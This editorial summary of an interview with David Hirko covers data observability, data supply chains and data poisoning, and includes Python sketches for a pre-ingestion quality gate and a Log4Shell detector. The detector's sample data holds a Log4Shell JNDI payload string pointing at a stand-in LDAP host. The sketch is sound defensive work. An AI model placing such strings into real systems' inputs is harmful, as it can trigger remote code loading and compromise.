David Hirko - AI observability and data as a cybersecurity weakness
Summary
David Hirko, founder of Zectonal, discusses data observability and its role in cybersecurity, particularly for AI and machine learning. He highlights the difficulty of ensuring data quality and provenance at scale, noting that many organizations assume their data is legitimate without verifying it. Hirko defines data observability as monitoring quality trends in data at two levels: macro (e.g., timeliness, staleness, volume) and micro (e.g., schema consistency, null values). He introduces the concept of a "data supply chain," emphasizing the need to trace data from individual sensors through multiple aggregators, much as traditional manufacturing supply chains are tracked. The discussion also covers data poisoning as a cybersecurity threat, using the Log4Shell vulnerability as an example: malicious payloads embedded in data files can compromise internal systems, in contrast to traditional attacks on internet-facing systems. Zectonal's approach involves deep data inspection to detect issues before data enters a data lake, and Hirko anticipates a growing challenge in distinguishing real from synthetic data.
Key takeaway
For CTOs and VPs of Data/AI, understanding and implementing robust data observability is no longer optional but a strategic imperative. Your organization's data supply chain is a significant attack surface, and vulnerabilities can be introduced through subtle data poisoning or quality degradation. Prioritize tools and processes that enable deep data inspection and pre-ingestion validation to safeguard your AI models and analytics from compromised data, especially as synthetic data becomes more prevalent.
Key insights
Data observability is crucial for ensuring data quality and security, especially as data becomes a primary attack vector for AI systems.
Principles
- Assume data is not inherently trustworthy.
- Data quality issues often stem from upstream supply chain anomalies.
- Security must be embedded in data observability.
Method
Inspect data deeply before it is ingested into a data lake, so that poor-quality or malicious data is caught at the boundary, and monitor both macro and micro data trends.
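To make the method concrete, here is a minimal Python sketch of a pre-ingestion gate that applies the macro checks (volume, staleness) and micro checks (schema consistency, null values) named in the summary. It is an illustration only, not Zectonal's implementation: the function names, the thresholds, and the list-of-dicts batch format are all assumptions made for this example.

```python
from datetime import datetime, timedelta, timezone


def macro_checks(row_count, newest_record_time, now, expected_min_rows, max_age):
    """Batch-level (macro) checks: volume and staleness."""
    issues = []
    if row_count < expected_min_rows:
        issues.append("volume")
    if now - newest_record_time > max_age:
        issues.append("staleness")
    return issues


def micro_checks(rows, expected_columns, max_null_ratio):
    """Record-level (micro) checks: schema consistency and null values."""
    issues = []
    expected = set(expected_columns)
    if any(set(row) != expected for row in rows):
        issues.append("schema")
    cells = [value for row in rows for value in row.values()]
    null_ratio = sum(v is None for v in cells) / len(cells) if cells else 0.0
    if null_ratio > max_null_ratio:
        issues.append("nulls")
    return issues


def admit_batch(rows, newest_record_time, now, expected_columns,
                expected_min_rows=1, max_age=timedelta(hours=24),
                max_null_ratio=0.1):
    """Return (admitted, issues); thresholds are hypothetical defaults."""
    issues = macro_checks(len(rows), newest_record_time, now,
                          expected_min_rows, max_age)
    issues += micro_checks(rows, expected_columns, max_null_ratio)
    return (not issues, issues)


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    batch = [{"id": 1, "temp": 20.5}, {"id": 2, "temp": 21.0}]
    print(admit_batch(batch, now - timedelta(hours=1), now, ["id", "temp"]))
```

A batch is admitted only when the list of issues is empty. In a real pipeline the thresholds would more plausibly be derived from historical trends than fixed constants, since the summary describes observability as monitoring trends rather than single snapshots.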
In practice
- Scrutinize data provenance from third-party suppliers.
- Conduct deep dives on ETL job failures to identify data anomalies.
- Exercise caution when using untrusted data sources for projects.
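The summary cites Log4Shell as an example of a malicious payload carried inside data files. As a rough sketch of what one narrow pre-ingestion check might look like, the Python snippet below flags string fields containing a `${jndi:` lookup, the string form that triggers Log4Shell (CVE-2021-44228) in vulnerable Log4j versions. The function name and record format are assumptions for illustration, and a plain pattern match like this will miss obfuscated variants, so it should be read as a starting point rather than a complete defense.

```python
import re

# Matches the start of a JNDI lookup such as "${jndi:ldap://...}".
# Obfuscated forms (e.g. nested lookups) are NOT covered by this pattern.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_suspicious_fields(records):
    """Return (record_index, field_name) pairs whose string value
    contains a JNDI lookup marker."""
    hits = []
    for index, record in enumerate(records):
        for field, value in record.items():
            if isinstance(value, str) and JNDI_PATTERN.search(value):
                hits.append((index, field))
    return hits


if __name__ == "__main__":
    sample = [
        {"user": "alice", "agent": "Mozilla/5.0"},
        {"user": "bob", "agent": "${jndi:ldap://example.invalid/a}"},
    ]
    print(find_suspicious_fields(sample))
```

Records that produce hits could be quarantined for review instead of being loaded into the data lake, which keeps the payload away from any internal system that might log or parse it.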
Topics
- Data Observability
- Data Cybersecurity
- Data Supply Chain
- Data Poisoning
- Synthetic Data
Best for: CTO, VP of Engineering/Data, Director of AI/ML, Data Scientist, Machine Learning Engineer, AI Security Engineer
Editorial summary, takeaway, and curation by AIssential. Original article published by Towards Data Science.